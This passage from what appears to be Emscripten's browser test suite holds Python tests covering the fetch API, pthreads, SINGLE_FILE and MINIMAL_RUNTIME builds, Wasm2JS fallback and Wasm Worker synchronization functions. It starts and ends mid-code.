self.btest_exit('fetch/to_memory.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST']) # Test the positive case when the file URL exists. (http 200) shutil.copyfile(test_file('gears.png'), 'gears.png') for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]: self.btest_exit('fetch/to_memory.cpp', args=['-sFETCH_DEBUG', '-sFETCH'] + arg) @parameterized({ '': ([],), 'pthread_exit': (['-DDO_PTHREAD_EXIT'],), }) @no_firefox('https://github.com/emscripten-core/emscripten/issues/16868') @requires_threads def test_fetch_from_thread(self, args): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/from_thread.cpp', args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'], also_wasm2js=True) @also_with_wasm2js def test_fetch_to_indexdb(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/to_indexeddb.cpp', args=['-sFETCH_DEBUG', '-sFETCH']) # Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there. @also_with_wasm2js def test_fetch_cached_xhr(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/cached_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH']) # Tests that response headers get set on emscripten_fetch_t values. @no_firefox('https://github.com/emscripten-core/emscripten/issues/16868') @also_with_wasm2js @requires_threads def test_fetch_response_headers(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) # Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory @also_with_wasm2js def test_fetch_stream_file(self): self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed') # Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file # won't fully fit in the heap. This verifies that streaming works properly. s = '12345678' for i in range(14): s = s[::-1] + s # length of str will be 2^17=128KB with open('largefile.txt', 'w') as f: for i in range(1024): f.write(s) self.btest_exit('fetch/stream_file.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912']) def test_fetch_headers_received(self): self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH']) # Tests emscripten_fetch() usage in synchronous mode when used from the main # thread proxied to a Worker with -sPROXY_TO_PTHREAD option. @no_firefox('https://github.com/emscripten-core/emscripten/issues/16868') @requires_threads def test_fetch_sync_xhr(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) # Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download). # In that case, in append is implicitly understood. @no_firefox('https://github.com/emscripten-core/emscripten/issues/16868') @requires_threads def test_fetch_implicit_append(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) # Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp. @no_firefox('https://github.com/emscripten-core/emscripten/issues/16868') @requires_threads def test_fetch_sync_xhr_in_wasm(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) # Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker. @no_firefox('https://github.com/emscripten-core/emscripten/issues/16868') @also_with_wasm2js @requires_threads def test_fetch_sync_xhr_in_proxy_to_worker(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker']) # Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread @unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker") @requires_threads def test_fetch_sync_fetch_in_main_thread(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) @requires_threads @disabled('https://github.com/emscripten-core/emscripten/issues/16746') def test_fetch_idb_store(self): self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD']) @requires_threads @disabled('https://github.com/emscripten-core/emscripten/issues/16746') def test_fetch_idb_delete(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD']) @requires_threads def test_pthread_locale(self): self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal')) self.emcc_args.append('-I' + path_from_root('system/lib/pthread')) for args in [ [], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'], ]: print("Testing with: ", args) self.btest_exit('pthread/test_pthread_locale.c', args=args) # Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and # emscripten_get_canvas_element_size() functionality in singlethreaded programs. def test_emscripten_set_canvas_element_size(self): self.btest_exit('emscripten_set_canvas_element_size.c') # Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main # thread to obtain the proper window.devicePixelRatio value). @requires_threads def test_emscripten_get_device_pixel_ratio(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args) # Tests that emscripten_run_script() variants of functions work in pthreads. @requires_threads def test_pthread_run_script(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args) # Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations. @requires_threads @requires_graphics_hardware def test_emscripten_animate_canvas_element_size(self): for args in [ ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'], ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'], ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'], ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'], ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'], ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'], ]: cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args print(' '.join(cmd)) self.btest_exit('canvas_animate_resize.cpp', args=cmd) # Tests the absolute minimum pthread-enabled application. @parameterized({ '': ([],), 'O3': (['-O3'],) }) @requires_threads def test_pthread_hello_thread(self, opts): for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]: self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts) # Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes @parameterized({ '': ([],), 'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],), 'O3': (['-O3'],), 'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],), 'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],), }) def test_minimal_runtime_hello_thread(self, opts): self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts) # Tests memory growth in pthreads mode, but still on the main thread. @requires_threads def test_pthread_growth_mainthread(self): self.emcc_args.remove('-Werror') def run(emcc_args=[]): self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False) run() run(['-sPROXY_TO_PTHREAD']) # Tests memory growth in a pthread. @requires_threads def test_pthread_growth(self): self.emcc_args.remove('-Werror') def run(emcc_args=[]): self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False) run() run(['-sASSERTIONS']) run(['-sPROXY_TO_PTHREAD']) # Tests that time in a pthread is relative to the main thread, so measurements # on different threads are still monotonic, as if checking a single central # clock. @requires_threads def test_pthread_reltime(self): self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) # Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads. @requires_threads def test_load_js_from_blob_with_pthreads(self): # TODO: enable this with wasm, currently pthreads/atomics have limitations self.set_setting('EXIT_RUNTIME') self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY) shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html') self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0') # Tests that base64 utils work in browser with no native atob function def test_base64_atob_fallback(self): create_file('test.c', r''' #include <stdio.h> #include <emscripten.h> int main() { return 0; } ''') # generate a dummy file create_file('dummy_file', 'dummy') # compile the code with the modularize feature and the preload-file option enabled self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE']) create_file('a.html', ''' <script> atob = undefined; fetch = undefined; </script> <script src="a.out.js"></script> <script> var foo = Foo(); </script> ''') self.run_browser('a.html', '...', '/report_result?exit:0') # Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker) def test_single_file_html(self): self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True) self.assertExists('test.html') self.assertNotExists('test.js') self.assertNotExists('test.worker.js') self.assertNotExists('test.wasm') self.assertNotExists('test.mem') # Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME def test_minimal_runtime_single_file_html(self): for wasm in [0, 1]: for opts in [[], ['-O3']]: self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)]) self.assertExists('test.html') self.assertNotExists('test.js') self.assertNotExists('test.wasm') self.assertNotExists('test.asm.js') self.assertNotExists('test.mem') self.assertNotExists('test.js') self.assertNotExists('test.worker.js') # Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933) def test_single_file_in_web_environment_with_closure(self): self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1']) # Tests that SINGLE_FILE works as intended with locateFile def test_single_file_locate_file(self): for wasm_enabled in [True, False]: args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE'] if not wasm_enabled: args += ['-sWASM=0'] self.compile_btest(args) create_file('test.html', ''' <script> var Module = { locateFile: function (path) { if (path.indexOf('data:') === 0) { throw new Error('Unexpected data URI.'); } return path; } }; </script> <script src="test.js"></script> ''') self.run_browser('test.html', None, '/report_result?0') # Tests that SINGLE_FILE works as intended in a Worker in JS output def test_single_file_worker_js(self): self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE']) create_file('test.html', '<script src="test.js"></script>') self.run_browser('test.html', None, '/report_result?0') self.assertExists('test.js') self.assertNotExists('test.worker.js') # Tests that pthreads code works as intended in a Worker. That is, a pthreads-using # program can run either on the main thread (normal tests) or when we start it in # a Worker in this test (in that case, both the main application thread and the worker threads # are all inside Web Workers). @requires_threads def test_pthreads_started_in_worker(self): self.set_setting('EXIT_RUNTIME') self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY) create_file('test.html', ''' <script> new Worker('test.js'); </script> ''') self.run_browser('test.html', None, '/report_result?exit:0') def test_access_file_after_heap_resize(self): create_file('test.txt', 'hello from file') self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt']) # with separate file packager invocation self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js']) self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM']) def test_unicode_html_shell(self): create_file('main.cpp', r''' int main() { return 0; } ''') create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅')) self.btest_exit('main.cpp', args=['--shell-file', 'shell.html']) # Tests the functionality of the emscripten_thread_sleep() function. @requires_threads def test_emscripten_thread_sleep(self): self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]']) # Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page def test_browser_run_from_different_directory(self): self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3']) ensure_dir('subdir') shutil.move('test.js', Path('subdir/test.js')) shutil.move('test.wasm', Path('subdir/test.wasm')) src = read_file('test.html') # Make sure JS is loaded from subdirectory create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js')) self.run_browser('test-subdir.html', None, '/report_result?0') # Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE` def test_browser_run_from_different_directory_async(self): for args, creations in [ (['-sMODULARIZE'], [ 'Module();', # documented way for using modularize 'new Module();' # not documented as working, but we support it ]), ]: print(args) # compile the code with the modularize feature and the preload-file option enabled self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args) ensure_dir('subdir') shutil.move('test.js', Path('subdir/test.js')) shutil.move('test.wasm', Path('subdir/test.wasm')) for creation in creations: print(creation) # Make sure JS is loaded from subdirectory create_file('test-subdir.html', ''' <script src="subdir/test.js"></script> <script> %s </script> ''' % creation) self.run_browser('test-subdir.html', None, '/report_result?0') # Similar to `test_browser_run_from_different_directory`, but # also also we eval the initial code, so currentScript is not present. That prevents us # from finding the file in a subdir, but here we at least check we do not regress compared to the # normal case of finding in the current dir. def test_browser_modularize_no_current_script(self): # test both modularize (and creating an instance) and modularize-instance # (which creates by itself) for path, args, creation in [ ([], ['-sMODULARIZE'], 'Module();'), (['subdir'], ['-sMODULARIZE'], 'Module();'), ]: print(path, args, creation) filesystem_path = os.path.join('.', *path) ensure_dir(filesystem_path) # compile the code with the modularize feature and the preload-file option enabled self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args) shutil.move('test.js', Path(filesystem_path, 'test.js')) shutil.move('test.wasm', Path(filesystem_path, 'test.wasm')) create_file(Path(filesystem_path, 'test.html'), ''' <script> setTimeout(function() { var xhr = new XMLHttpRequest(); xhr.open('GET', 'test.js', false); xhr.send(null); eval(xhr.responseText); %s }, 1); </script> ''' % creation) self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0') def test_emscripten_request_animation_frame(self): self.btest_exit(test_file('emscripten_request_animation_frame.c')) def test_emscripten_request_animation_frame_loop(self): self.btest_exit(test_file('emscripten_request_animation_frame_loop.c')) def test_request_animation_frame(self): self.btest_exit('request_animation_frame.cpp', also_proxied=True) @requires_threads def test_emscripten_set_timeout(self): self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) @requires_threads def test_emscripten_set_timeout_loop(self): self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) def test_emscripten_set_immediate(self): self.btest_exit(test_file('emscripten_set_immediate.c')) def test_emscripten_set_immediate_loop(self): self.btest_exit(test_file('emscripten_set_immediate_loop.c')) @requires_threads def test_emscripten_set_interval(self): self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) # Test emscripten_performance_now() and emscripten_date_now() @requires_threads def test_emscripten_performance_now(self): self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) @requires_threads def test_embind_with_pthreads(self): self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2']) def test_embind_with_asyncify(self): self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY']) # Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error() def test_emscripten_console_log(self): self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')]) def test_emscripten_throw_number(self): self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')]) def test_emscripten_throw_string(self): self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')]) # Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application def test_closure_in_web_only_target_environment_console_log(self): self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1']) # Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application @requires_graphics_hardware def test_closure_in_web_only_target_environment_webgl(self): self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1']) def test_no_declare_asm_module_exports_asmjs(self): # TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0 self.ldflags.remove('-sCLOSURE_WARNINGS=error') for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]: self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime) def test_no_declare_asm_module_exports_wasm_minimal_runtime(self): for mode in [1, 2]: self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}']) # Tests that the different code paths in src/shell_minimal_runtime.html all work ok. def test_minimal_runtime_loader_shell(self): args = ['-sMINIMAL_RUNTIME=2'] for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]: for modularize in [[], ['-sMODULARIZE']]: print(str(args + wasm + modularize)) self.btest_exit('minimal_hello.c', args=args + wasm + modularize) # Tests that -sMINIMAL_RUNTIME works well in different build modes def test_minimal_runtime_hello_world(self): for args in [ [], ['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1'] ]: self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME']) @requires_threads def test_offset_converter(self, *args): self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS']) # Tests emscripten_unwind_to_js_event_loop() behavior def test_emscripten_unwind_to_js_event_loop(self, *args): self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c')) def test_wasm2js_fallback(self): self.set_setting('EXIT_RUNTIME') for args in [[], ['-sMINIMAL_RUNTIME']]: self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args) # First run with WebAssembly support enabled # Move the Wasm2js fallback away to test it is not accidentally getting loaded. os.rename('test.wasm.js', 'test.wasm.js.unused') self.run_browser('test.html', 'hello!', '/report_result?exit:0') os.rename('test.wasm.js.unused', 'test.wasm.js') # Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback. html = read_file('test.html') html = html.replace('<body>', '<body><script>delete WebAssembly;</script>') open('test.html', 'w').write(html) os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded. self.run_browser('test.html', 'hello!', '/report_result?exit:0') def test_wasm2js_fallback_on_wasm_compilation_failure(self): self.set_setting('EXIT_RUNTIME') for args in [[], ['-sMINIMAL_RUNTIME']]: self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args) # Run without the .wasm.js file present: with Wasm support, the page should still run os.rename('test.wasm.js', 'test.wasm.js.unused') self.run_browser('test.html', 'hello!', '/report_result?exit:0') # Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run os.rename('test.wasm.js.unused', 'test.wasm.js') shutil.copyfile('test.js', 'test.wasm') self.run_browser('test.html', 'hello!', '/report_result?exit:0') def test_system(self): self.btest_exit(test_file('system.c')) # Tests the hello_wasm_worker.c documentation example code. @also_with_minimal_runtime def test_wasm_worker_hello(self): self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS']) def test_wasm_worker_hello_minimal_runtime_2(self): self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2']) # Tests Wasm Workers build in Wasm2JS mode. @also_with_minimal_runtime def test_wasm_worker_hello_wasm2js(self): self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0']) # Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script file to the main JS file. @also_with_minimal_runtime def test_wasm_worker_embedded(self): self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2']) # Tests Wasm Worker thread stack setup @also_with_minimal_runtime def test_wasm_worker_thread_stack(self): for mode in [0, 1, 2]: self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}']) # Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions @also_with_minimal_runtime def test_wasm_worker_malloc(self): self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS']) # Tests Wasm Worker+pthreads simultaneously @also_with_minimal_runtime def test_wasm_worker_and_pthreads(self): self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread']) # Tests emscripten_wasm_worker_self_id() function @also_with_minimal_runtime def test_wasm_worker_self_id(self): self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS']) # Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers @also_with_minimal_runtime def test_wasm_worker_tls_wasm_assembly(self): self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'), expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')]) # Tests C++11 keyword thread_local for TLS in Wasm Workers @also_with_minimal_runtime def test_wasm_worker_cpp11_thread_local(self): self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS']) # Tests C11 keyword _Thread_local for TLS in Wasm Workers @also_with_minimal_runtime def test_wasm_worker_c11__Thread_local(self): self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot test C11 - because of EM_ASM must test Gnu11. # Tests GCC specific extension keyword __thread for TLS in Wasm Workers @also_with_minimal_runtime def test_wasm_worker_gcc___thread(self): self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Tests emscripten_wasm_worker_sleep() @also_with_minimal_runtime def test_wasm_worker_sleep(self): self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS']) # Tests emscripten_terminate_wasm_worker() @also_with_minimal_runtime def test_wasm_worker_terminate(self): self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_terminate_all_wasm_workers() @also_with_minimal_runtime def test_wasm_worker_terminate_all(self): self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_wasm_worker_post_function_*() API @also_with_minimal_runtime def test_wasm_worker_post_function(self): self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS']) # Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT # to send a message back from Worker to its parent thread. @also_with_minimal_runtime def test_wasm_worker_post_function_to_main_thread(self): self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS']) # Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free() @also_with_minimal_runtime def test_wasm_worker_hardware_concurrency_is_lock_free(self): self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions. @also_with_minimal_runtime def test_wasm_worker_wait32_notify(self): self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS']) # Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions. @also_with_minimal_runtime def test_wasm_worker_wait64_notify(self): self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS']) # Tests emscripten_atomic_wait_async() function. @also_with_minimal_runtime def test_wasm_worker_wait_async(self): self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_atomic_cancel_wait_async() function. @also_with_minimal_runtime def test_wasm_worker_cancel_wait_async(self): self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS']) # Tests emscripten_atomic_cancel_all_wait_asyncs() function. @also_with_minimal_runtime def test_wasm_worker_cancel_all_wait_asyncs(self): self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS']) # Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function. @also_with_minimal_runtime def test_wasm_worker_cancel_all_wait_asyncs_at_address(self): self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS']) # Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release() @also_with_minimal_runtime def test_wasm_worker_lock_waitinf(self): self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS']) # Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker. @also_with_minimal_runtime def test_wasm_worker_lock_wait(self): self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_lock_wait_acquire() between two Wasm Workers. @also_with_minimal_runtime def test_wasm_worker_lock_wait2(self): self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_lock_async_acquire() function. @also_with_minimal_runtime def test_wasm_worker_lock_async_acquire(self): self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS']) # Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread. @also_with_minimal_runtime def test_wasm_worker_lock_busyspin_wait(self): self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread. @also_with_minimal_runtime def test_wasm_worker_lock_busyspin_waitinf(self): self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS']) # Tests that proxied JS functions cannot be called from Wasm Workers @also_with_minimal_runtime def test_wasm_worker_no_proxied_js_functions(self): self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0', args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS']) # Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release() @also_with_minimal_runtime def 